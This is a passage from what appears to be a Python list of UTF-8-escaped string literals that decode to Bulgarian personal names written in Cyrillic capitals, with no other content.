\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92', '\xd0\x94\xd0\xa0\xd0\x90\xd0\x93\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x92\xd0\x95\xd0\x9b\xd0\x9a\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x99\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\x94\xd0\x95\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x95\xd0\x92 \xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x95\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\xaf\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa5\xd0\x9b\xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x92\xd0\x95\xd0\xa2\xd0\x9b\xd0\x98\xd0\x9d \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x90\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d \xd0\x95\xd0\x9c\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa1\xd0\x98\xd0\xa7\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x92\xd0\x93\xd0\x95\xd0\x9d\xd0\x98\xd0\x99 \xd0\x96\xd0\x95\xd0\x9b\xd0\x95\xd0\x92 \xd0\x96\xd0\x95\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x90\xd0\xa0\xd0\x90\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x96\xd0\x98\xd0\x92\xd0\x9a\xd0\x9e \xd0\x92\xd0\x95\xd0\xa1\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x94\xd0\x95\xd0\xa7\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x95\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\xae\xd0\xa2\xd0\x92\xd0\x98 \xd0\x90\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\x9c\xd0\x95\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d', '\xd0\x9d\xd0\x95\xd0\x94\xd0\xaf\xd0\x9b\xd0\x9a\xd0\x9e \xd0\xa2\xd0\x95\xd0\x9d\xd0\x95\xd0\x92 \xd0\x9d\xd0\x95\xd0\x94\xd0\xaf\xd0\x9b\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x95\xd0\x9b\xd0\x98 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9a\xd0\x90\xd0\x9b\xd0\x9d\xd0\x95\xd0\x92\xd0\x90-\xd0\x9c\xd0\x98\xd0\xa2\xd0\x95\xd0\x92\xd0\x90', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa5\xd0\x9b\xd0\x95\xd0\x91\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x9f\xd0\x90\xd0\xa1 \xd0\xaf\xd0\x9d\xd0\x95\xd0\x92 \xd0\x9f\xd0\x90\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92', '\xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x95\xd0\xa0\xd0\x94\xd0\x9e\xd0\x90\xd0\x9d \xd0\x9c\xd0\xa3\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa4\xd0\x9e\xd0\x92 \xd0\x90\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c \xd0\x98\xd0\xa1\xd0\x9c\xd0\x90\xd0\x98\xd0\x9b \xd0\x94\xd0\x90\xd0\x9b', '\xd0\x9b\xd0\x98\xd0\x9b\xd0\x98 \xd0\x91\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x90\xd0\x9a\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa2\xd0\xa3\xd0\x9d\xd0\xa7\xd0\x95\xd0\xa0 \xd0\x9c\xd0\x95\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94\xd0\x9e\xd0\x92 \xd0\x9a\xd0\xaa\xd0\xa0\xd0\x94\xd0\x96\xd0\x90\xd0\x9b\xd0\x98\xd0\x95\xd0\x92', '\xd0\x93\xd0\xae\xd0\x9d\xd0\x95\xd0\xa0 \xd0\xa4\xd0\x90\xd0\xa0\xd0\x98\xd0\x97 \xd0\xa1\xd0\x95\xd0\xa0\xd0\x91\xd0\x95\xd0\xa1\xd0\xa2', '\xd0\x94\xd0\x95\xd0\x9b\xd0\xaf\xd0\x9d \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x95\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b\xd0\x98\xd0\xaf \xd0\xa0\xd0\x90\xd0\x94\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x90\xd0\xa1\xd0\x9b\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x92\xd0\x9e \xd0\xa2\xd0\x95\xd0\x9d\xd0\x95\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\xa4\xd0\x90\xd0\x9d\xd0\x98 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92\xd0\x90', '\xd0\xae\xd0\x9d\xd0\x90\xd0\x9b \xd0\xa1\xd0\x90\xd0\x98\xd0\x94 \xd0\x9b\xd0\xae\xd0\xa2\xd0\xa4\xd0\x98', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\x92\xd0\x95\xd0\x9b\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x94\xd0\xaa\xd0\x91\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x92\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\xa2\xd0\x9e\xd0\xa8\xd0\x95\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x9d\xd0\x95\xd0\x94\xd0\x95\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9c\xd0\x98\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92', '\xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e \xd0\x94\xd0\x90\xd0\x9c\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x91\xd0\x98\xd0\xa1\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa7\xd0\x95\xd0\xa2\xd0\x98\xd0\x9d \xd0\xa5\xd0\xae\xd0\xa1\xd0\x95\xd0\x98\xd0\x9d \xd0\x9a\xd0\x90\xd0\x97\xd0\x90\xd0\x9a', '\xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xaa\xd0\xa0 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x99\xd0\xa7\xd0\x95\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x99\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa1 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x95\xd0\xa0\xd0\x94\xd0\x96\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9e\xd0\x93\xd0\x9d\xd0\xaf\xd0\x9d \xd0\x90\xd0\x9d\xd0\x94\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\x99\xd0\xa7\xd0\x95\xd0\x92', '\xd0\xa1\xd0\x92\xd0\x95\xd0\xa2\xd0\x9e\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa2\xd0\x9e\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92 \xd0\xa2\xd0\x9e\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x98\xd0\x95\xd0\x92', '\xd0\x92\xd0\xaf\xd0\xa0\xd0\x90 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\xaf\xd0\x9d\xd0\x9a\xd0\x9e \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x97\xd0\x94\xd0\xa0\xd0\x90\xd0\x92\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90 \xd0\x92\xd0\xaa\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92\xd0\x90 \xd0\x9a\xd0\x90\xd0\xa0\xd0\x90\xd0\xaf\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92\xd0\x90', '\xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d\xd0\x98 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x9d\xd0\x95\xd0\x92\xd0\x90 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x90\xd0\xa1\xd0\x9f\xd0\x90\xd0\xa0\xd0\xa3\xd0\xa5 \xd0\x91\xd0\x9e\xd0\xa7\xd0\x95\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x9d\xd0\x95\xd0\x96\xd0\x90\xd0\x9d\xd0\x90 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90 \xd0\x94\xd0\xa3\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x90\xd0\x9d\xd0\xa2\xd0\x9e\xd0\x9d\xd0\x98\xd0\x99 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\xa3\xd0\xa8\xd0\x95\xd0\x9d \xd0\x9c\xd0\x95\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\xa0\xd0\x98\xd0\x97\xd0\x90', '\xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x98\xd0\x9b \xd0\xa0\xd0\x90\xd0\xa8\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x93\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\xa6\xd0\x92\xd0\xaf\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x95\xd0\xa0\xd0\x97\xd0\x98\xd0\x99\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\x93\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92', '\xd0\xa2\xd0\x90\xd0\x9d\xd0\xaf \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x92\xd0\xaa\xd0\x96\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\x9a\xd0\x98\xd0\xa0\xd0\x95\xd0\x92 \xd0\x94\xd0\x90\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\x90\xd0\x9d\xd0\x94\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa5\xd0\x90\xd0\x9c\xd0\x98\xd0\x94 \xd0\x91\xd0\x90\xd0\xa0\xd0\x98 \xd0\xa5\xd0\x90\xd0\x9c\xd0\x98\xd0\x94', '\xd0\x94\xd0\x98\xd0\x90\xd0\x9d\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9a\xd0\x90\xd0\xa2\xd0\xaf \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9a\xd0\x9e\xd0\x9b\xd0\x95\xd0\x92\xd0\x90', '\xd0\x9d\xd0\x95\xd0\x94\xd0\xaf\xd0\x9b\xd0\x9a\xd0\x9e \xd0\x96\xd0\x98\xd0\x92\xd0\x9a\xd0\x9e\xd0\x92 \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e \xd0\x92\xd0\x90\xd0\x9b\xd0\x95\xd0\x9d\xd0\xa2\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\xa2\xd0\x95\xd0\x9d\xd0\x95\xd0\x92 \xd0\xa0\xd0\xa3\xd0\xa1\xd0\x95\xd0\x92', '\xd0\x9a\xd0\x90\xd0\xa2\xd0\xaf \xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa7\xd0\x90\xd0\x9b\xd0\xaa\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x92\xd0\x95\xd0\xa1\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d \xd0\x92\xd0\x95\xd0\x9b\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x94\xd0\x90\xd0\x92\xd0\x98\xd0\x94\xd0\x9e\xd0\x92', '\xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\xa7\xd0\x90\xd0\xa3\xd0\xa8\xd0\x95\xd0\x92', '\xd0\x9b\xd0\x98\xd0\x9b\xd0\x98\xd0\xaf \xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x94\xd0\x90\xd0\xa1\xd0\x9a\xd0\x90\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x97\xd0\x9b\xd0\x90\xd0\xa2\xd0\x9a\xd0\x9e \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x90\xd0\x9b\xd0\x95\xd0\xa0\xd0\x98 \xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9d\xd0\xa2\xd0\x9e\xd0\x9d\xd0\x98\xd0\x99 \xd0\x92\xd0\x95\xd0\x9d\xd0\xa6\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92 \xd0\x9a\xd0\xa0\xd0\xaa\xd0\xa1\xd0\xa2\xd0\x95\xd0\x92', '\xd0\xa0\xd0\x90\xd0\x9b\xd0\x98\xd0\xa6\xd0\x90 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\xa4\xd0\x9e\xd0\xa0 \xd0\x9d\xd0\x95\xd0\x94\xd0\x95\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92 \xd0\x90\xd0\xa7\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x98\xd0\x9d \xd0\x9d\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x94\xd0\x90\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x92\xd0\x90\xd0\x9d\xd0\xaf \xd0\xa7\xd0\x90\xd0\x92\xd0\x94\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x95\xd0\x92\xd0\x90', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x98\xd0\x9b\xd0\x98\xd0\x95\xd0\x92 \xd0\xaf\xd0\x9a\xd0\x98\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x90\xd0\x9d\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90-\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\xaf \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90-\xd0\x9c\xd0\x98\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92\xd0\x90', '\xd0\x92\xd0\x95\xd0\xa1\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d \xd0\x93\xd0\xa0\xd0\x98\xd0\x93\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa1\xd0\x9f\xd0\x98\xd0\xa0\xd0\x98\xd0\x94\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x98\xd0\x9b\xd0\x98\xd0\x95\xd0\x92 \xd0\x94\xd0\xa3\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\xa1\xd0\x98\xd0\x9c\xd0\x95\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x9f\xd0\x90\xd0\x9d\xd0\x94\xd0\xa3\xd0\xa8\xd0\x95\xd0\x92 \xd0\xa7\xd0\x9e\xd0\x91\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaf \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa0\xd0\x90\xd0\x95\xd0\x92\xd0\x90', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x94\xd0\xa3\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9d\xd0\xa3\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x92\xd0\x95\xd0\xa1\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x9e\xd0\xa0\xd0\x95\xd0\xa8\xd0\x90\xd0\xa0\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaf \xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x90\xd0\x92\xd0\xa0\xd0\x90\xd0\x9c\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x90\xd0\x9d\xd0\xa3\xd0\xa8\xd0\x95\xd0\x92', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x93\xd0\x95\xd0\xa7\xd0\x95\xd0\x92', '\xd0\xa0\xd0\x9e\xd0\xa1\xd0\x95\xd0\x9d \xd0\x9c\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\xa2\xd0\x90\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x98\xd0\x9b\xd0\x92\xd0\x98\xd0\xaf \xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa5\xd0\xa3\xd0\x91\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\xa1\xd0\x95\xd0\x9c\xd0\x98\xd0\xa0 \xd0\xa5\xd0\xa3\xd0\xa1\xd0\x95\xd0\x98\xd0\x9d \xd0\x90\xd0\x91\xd0\xa3 \xd0\x9c\xd0\x95\xd0\x9b\xd0\x98\xd0\xa5', 